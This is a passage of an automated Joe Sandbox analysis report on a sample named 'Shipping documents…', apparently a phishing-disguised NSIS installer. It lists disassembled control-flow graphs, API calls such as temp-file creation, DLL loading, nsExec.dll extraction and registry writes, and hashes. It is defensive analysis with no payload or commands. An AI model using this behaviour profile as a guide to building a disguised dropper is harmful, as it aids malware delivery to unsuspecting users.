                                      • MulDiv.KERNEL32(?,00000064,?), ref: 0040329A
                                      • wsprintfW.USER32 ref: 004032AB
                                        • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CountTick$FilePointerwsprintf
                                      • String ID: ... %d%%$85B$8SB
                                      • API String ID: 999035486-2531555371
                                      • Opcode ID: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
                                      • Instruction ID: e2bf7c2ae867e5e0c149cd35682d72f4c4d2633ef795981e2bf4a0daba4be17b
                                      • Opcode Fuzzy Hash: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
                                      • Instruction Fuzzy Hash: 355180716083019BD710DF69DD84A2BBBE8AB84756F10493FFC54E7291DB38DE088B5A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 959 40619e-4061be GetSystemDirectoryW 960 4061c0-4061c2 959->960 961 4061d8 959->961 960->961 962 4061c4-4061cf 960->962 963 4061da 961->963 962->963 964 4061d1-4061d6 962->964 965 4061df-40620c wsprintfW LoadLibraryExW 963->965 964->965
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
                                      • wsprintfW.USER32 ref: 004061F1
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406205
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
                                      • Instruction ID: 46fd840fe6511d7ccc003e1cb9660209246fe71c7ecdf6ea51a48f4d7cc48468
                                      • Opcode Fuzzy Hash: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
                                      • Instruction Fuzzy Hash: 93F0BB7160022467DB10A764DC0DB9A36ACEB00304F50447AA906F61C2E77CDE54C79C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 966 406a56-406a62 967 406a63-406a95 GetTickCount GetTempFileNameW 966->967 968 406aa0 967->968 969 406a97-406a99 967->969 971 406aa2-406aa5 968->971 969->967 970 406a9b-406a9e 969->970 970->971
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00406A72
                                      • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CD4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406A8D
                                      Strings
                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A5F
                                      • a, xrefs: 00406A6B
                                      • n, xrefs: 00406A64
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A5B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                      • API String ID: 1716503409-1137806429
                                      • Opcode ID: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
                                      • Instruction ID: ceede72bcc8b9f9399702d6205d38d242a1142e8e26f45c6d668c419d088e7be
                                      • Opcode Fuzzy Hash: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
                                      • Instruction Fuzzy Hash: E9F05E72700208BBEB149F55DC09BDE7779EF91B14F14803BEA41BA180E3F45E5487A4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 972 401dba-401dd8 call 403002 * 2 977 401dda-401de7 call 40303e 972->977 978 401deb-401ded 972->978 977->978 979 401df8-401dff 978->979 980 401def-401df6 call 40303e 978->980 984 401e50-401e75 call 40303e * 2 FindWindowExW 979->984 985 401e01-401e1c call 403002 * 2 979->985 980->979 995 401e7b 984->995 996 401e41-401e4e SendMessageW 985->996 997 401e1e-401e3f SendMessageTimeoutW 985->997 998 401e7f-401e83 995->998 996->995 997->998 999 402ea1-402eb7 998->999 1000 401e89 998->1000 1000->999
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
                                      • Instruction ID: 1d489b1cab37c72f7a9fe7ae17229530812e46ff9257658ed8c6d6ee4a6b2e26
                                      • Opcode Fuzzy Hash: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
                                      • Instruction Fuzzy Hash: 4F21F471609301AFE714AF21C886A2FBBE8EF84755F00093FF585A61E0D6B99D05CB5A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1004 40225d-402268 1005 40233e-402343 1004->1005 1006 40226e-402289 call 40303e * 2 1004->1006 1007 402345-40234a call 405d3a 1005->1007 1016 40228b-402296 GetModuleHandleW 1006->1016 1017 40229c-4022aa LoadLibraryExW 1006->1017 1013 402ea5-402eb7 1007->1013 1019 4022b0-4022c2 call 406269 1016->1019 1020 402298 1016->1020 1017->1019 1021 402335-40233c 1017->1021 1024 4022c4-4022ca 1019->1024 1025 402306-40230c call 405d3a 1019->1025 1020->1017 1021->1007 1027 4022e6-402304 1024->1027 1028 4022cc-4022e0 call 405d3a 1024->1028 1029 402311-402315 1025->1029 1027->1029 1028->1029 1037 4022e2-4022e4 1028->1037 1029->1013 1033 40231b-402323 call 403cd6 1029->1033 1033->1013 1038 402329-402330 FreeLibrary 1033->1038 1037->1029 1038->1013
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                        • Part of subcall function 00405D3A: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D6C
                                        • Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D7E
                                        • Part of subcall function 00405D3A: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D99
                                        • Part of subcall function 00405D3A: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 00405DB1
                                        • Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
                                        • Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                        • Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
                                      • API String ID: 334405425-2461694523
                                      • Opcode ID: ef58e730e87b036fb3bb273f3d25c6645116cf6908839c118768283bfaa69e59
                                      • Instruction ID: aa6b704e5079027a8c34e107c1f377ebbd1d9565507d54c53cf3a7cdcd1ba86e
                                      • Opcode Fuzzy Hash: ef58e730e87b036fb3bb273f3d25c6645116cf6908839c118768283bfaa69e59
                                      • Instruction Fuzzy Hash: C3210632648701ABD710AF618E8DA3F76A4ABD8721F20013FF941B12D1DBBC9801979F
                                      APIs
                                      • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406910
                                        • Part of subcall function 0040619E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
                                        • Part of subcall function 0040619E: wsprintfW.USER32 ref: 004061F1
                                        • Part of subcall function 0040619E: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406205
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                      • API String ID: 2547128583-890815371
                                      • Opcode ID: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
                                      • Instruction ID: 085141bfa328d30a19c357711f10e0b2ef6edf17adcd8b925e9f05de384a5053
                                      • Opcode Fuzzy Hash: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
                                      • Instruction Fuzzy Hash: 00D02B316012159BDB001F22AE0C94F771DEEA67907020032F501F6231E334DC21C5FC
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E7F
                                      • GetLastError.KERNEL32 ref: 00405E89
                                      • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405EA2
                                      • GetLastError.KERNEL32 ref: 00405EB0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID:
                                      • API String ID: 3449924974-0
                                      • Opcode ID: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
                                      • Instruction ID: 6ae0cafa5f15e980fc825a914f3c6ead540d2f1400f747b3271702dfe1e84024
                                      • Opcode Fuzzy Hash: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
                                      • Instruction Fuzzy Hash: 3F01D675D00209EBEB009FA0D948BEFBBB9EB14315F104526E949F2291E7789A44CF99
                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Exec,00000000,00000000,00000002,00405FBE), ref: 004069BE
                                      • RegCloseKey.ADVAPI32(?), ref: 004069C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: Exec
                                      • API String ID: 3356406503-459137531
                                      • Opcode ID: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
                                      • Instruction ID: a3e06d51c6875ee3f629547af2dd4b96d71687c661178dbbbd55dab6437f425a
                                      • Opcode Fuzzy Hash: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
                                      • Instruction Fuzzy Hash: D3010C7651010ABBDB218FA4DC06AEF7BA8EF45344F110126B901E2160D275DE60DB94
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00405E26
                                      • GetLastError.KERNEL32 ref: 00405E30
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1375471231-823278215
                                      • Opcode ID: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
                                      • Instruction ID: 407710f282aa9913273e94a45afee278ff037c1c447fef60eab8b448319c413c
                                      • Opcode Fuzzy Hash: 8059bd01f3cb96d00b90c150394375a165c75bb7fcfbb43778e4f95d7889324c
                                      • Instruction Fuzzy Hash: 56C012326050309BC3201B69AD0CA87BE94EB906A13018635B989E2220D2308C008AE8
                                      APIs
                                      • lstrlenW.KERNEL32(0040C108,00000023,?,00000011,00000002), ref: 004026C3
                                      • RegSetValueExW.KERNELBASE(?,?,?,?,0040C108,?,?,00000011,00000002), ref: 00402710
                                      • RegCloseKey.ADVAPI32(?,?,?,0040C108,?,?,00000011,00000002), ref: 0040271D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CloseValuelstrlen
                                      • String ID:
                                      • API String ID: 2655323295-0
                                      • Opcode ID: 8edcd19f25d8d05edf2d8148b6cc1e24fb060151bf47dec0a3455c4438ded43c
                                      • Instruction ID: b85799c5b09c0d4e5107b9a6a50aeda658419008c73e2f9c6ba38a7de01b1a8e
                                      • Opcode Fuzzy Hash: 8edcd19f25d8d05edf2d8148b6cc1e24fb060151bf47dec0a3455c4438ded43c
